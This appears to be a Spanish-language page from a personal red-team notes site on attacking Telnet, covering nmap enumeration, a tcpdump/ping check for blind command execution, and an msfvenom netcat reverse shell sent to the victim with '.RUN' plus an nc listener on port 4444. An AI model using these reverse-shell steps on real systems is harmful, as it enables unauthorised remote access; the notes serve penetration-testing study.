RED TEAM
  • Presentación
  • Apuntes Linux
  • Apuntes Blue Team
  • Apuntes Python
  • Ricardev github
  • RECON
    • OSINT
    • DESCUBRIENDO LA RED
      • NMAP NSE
    • SNIFFING
      • TCPDUMP
  • TECHNIQUES
    • FUERZA BRUTA
      • HYDRA
      • MEDUSA
      • JOHN THE RIPPER
      • NCRACK
      • RAINBOW TABLES
      • CHEATSHEET
    • CLAVES RSA DÉBILES
  • WEB HACKING
    • FUZZING
      • GOBUSTER
      • WFUZZ
      • OTRAS HERRAMIENTAS DE RECONOCIMIENTO WEB
    • OWASP TOP 10
      • A1-2017. SQL INJECTION
        • LOGIN FORM BYPASS
        • EXTRACCIÓN DE INFORMACIÓN.
        • SQLI MODIFIED HEADERS
        • BOOLEAN BLIND SQLI
        • TIME-BASED BLIND SQLI
        • AUTOMATIC INJECTION
      • A2-2017. ATAQUES A SISTEMAS DE AUTENTICACIÓN
      • A3-2017 - EXPOSICIÓN DE DATOS SENSIBLES
      • A4-2017. XXE
      • A5-2017. CONTROL DE ACCESO VULNERABLE
      • A6-2017. SEGURIDAD MAL CONFIGURADA
      • A7-2017. XSS
      • A8-2017. DESERIALIZACIÓN INSEGURA
      • A9-2017. USO DE COMPONENTES CON VULNERABILIDADES CONOCIDAS
      • A10-2017. REGISTRO Y MONITOREO INSUFICIENTE
    • SERVICIOS WEB
      • APACHE TOMCAT (RCE)
      • PRTG NETWORK MONITOR (RCE)
  • SERVICES HACKING (BOTH)
    • 20,21 - FTP
      • FTP BOUNCE ATTACK - ESCANEO
      • FTP BOUNCE ATTACK- DESCARGA DE OTRA FTP
    • 23 - TELNET
    • 25, 465 587 - SMTP
    • 111, 2049 - RPCBIND Y NFS
    • 161,162,10161,10162/udp - SNMP
      • SNMP (RCE Linux)
    • 445 - SMB
      • ETERNALBLUE
    • 3306 - MYSQL
  • SERVICES HACKING (LINUX)
    • 3632 - DISTCCD
  • SERVICES HACKING (WINDOWS)
    • 135, 539 - MSRPC
    • 389, 636 - LDAP / LDAPS
    • 1443 - MSSQL
  • ACTIVE DIRECTORY HACKING
    • CREANDO UN LABORATORIO DE AD
      • 1. Instalación de Windows Server 2016
      • 2. ROL DE ACTIVE DIRECTORY
      • 3. MALAS PRÁCTICAS NECESARIAS
    • CONCEPTOS
      • SPN Y KERBEROS
    • ENUMERACIÓN
      • BLOODHOUND
    • ATAQUES
      • SMB RELAY
      • NTLM RELAY
      • KERBEROASTING
      • AS_REP ROASTING
  • PRIVESC
    • WINDOWS
    • LINUX
      • LXD/LXC GROUP
  • EXFILTRACIÓN
    • EXFILTRANDO INFORMACIÓN
  • SHELL AND POWERSHELL TRICKS
    • Transfiriendo datos (traducir)
    • MEJORANDO SHELL A TTY INTERACTIVA (Traducir)
  • PWN LINUX
    • CREANDO UN LABORATORIO SIN MITIGACIONES
    • TEORÍA
      • ESTRUCTURA DE UN BINARIO DE LINUX
        • HERRAMIENTAS
      • ENSAMBLADOR
      • CONVENCIÓN DE LLAMADAS
      • MITIGACIONES
      • SYSCALL Y SHELLCODE
      • FORMAT STRING
      • RETURN-ORIENTED PROGRAMMING
        • GADGETS
    • ESTRATEGIAS DE EXPLOIT
      • STACK EXPLOITS
        • ATAQUE “SMASH THE STACK” SENCILLO
        • ATAQUE RET2WIN
        • ATAQUE RET2SHELLCODE
        • ATAQUE FORMAT STRING RET2SHELLCODE 2 BYTES
        • ATAQUE FORMAT STRING RET2SHELLCODE 4 BYTES
        • CANARY BYPASS
        • ATAQUE RET2LIBC
    • PRÁCTICA
      • PHOENIX
        • SETUP
        • STACK-ZERO amd64
        • STACK-ONE amd64
        • STACK-TWO amd64
        • STACK-THREE amd64
        • STACK-FOUR amd64
        • STACK-FIVE amd64
        • STACK-SIX amd64
        • FORMAT-ZERO amd64
Con tecnología de GitBook
En esta página
  • INFORMACIÓN BÁSICA
  • ENUMERACIÓN
  • EXPLOTACIÓN
  • No hay feedback en la TTY
  • Reverse Shell con msfvenom:

¿Te fue útil?

  1. SERVICES HACKING (BOTH)

23 - TELNET

explotar servicio de shell remota TELNET.

INFORMACIÓN BÁSICA

Telnet permite el control remoto de los ordenadores por medio de entradas y salidas basadas en texto. Con este objetivo, se crea una conexión cliente-servidor a través del puerto 23/TCP, donde el dispositivo controlado ejerce de servidor y espera a los comandos pertinentes. La instancia cliente es la que controla el proceso.

La conexión a través de este servicio es insegura ya que todos los datos se transmiten en texto claro.

La sintaxis para su uso es realmente sencilla:

telnet <IP> <PUERTO>

ENUMERACIÓN

La enumeración de este servicio se puede hacer a través de nmap utilizando el siguiente escaneo:

nmap -p <PUERTO> -sV --script="*telnet* and safe" <IP>

EXPLOTACIÓN

No hay feedback en la TTY

Una vez conectado al servicio, puede darse el caso de que no obtengamos feedback de los comandos que lanzamos. Para comprobar si realmente tenemos control sobre la victima podemos hacer lo siguiente:

1. Ejecutar un tcpdump en el atacante

De esta manera vamos a monitorizar todas las trazas ICMP que lleguen a mi ordenador atacante:

sudo tcpdump ip proto \\icmp -i <INTERFAZ>

2. Intentar lanzar una traza ICMP desde la victima.

Desde la victima intentamos lanzar una traza ICMP al atacante para monitorizarlo con tcpdump:

.RUN ping <IP ATACANTE> -c 1

Si esto funciona, significa que nuestra conexión funciona a la perfección.

Reverse Shell con msfvenom:

Para ejecutar una reverse shell desde una conexión TELNET, es necesario hacerla a través de netcat en la victima, para ello podemos utilizar msfvenom:

msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R

Y el resultado de este comando lo pasamos a la victima precedido de .RUN:

.RUN <mkfifo ...>

Para que todo esto funcione tenemos que tener nc a la escucha por ese puerto en la maquina atacante:

rlwrap nc -lvnp 4444
AnteriorFTP BOUNCE ATTACK- DESCARGA DE OTRA FTPSiguiente25, 465 587 - SMTP

Última actualización hace 2 años

¿Te fue útil?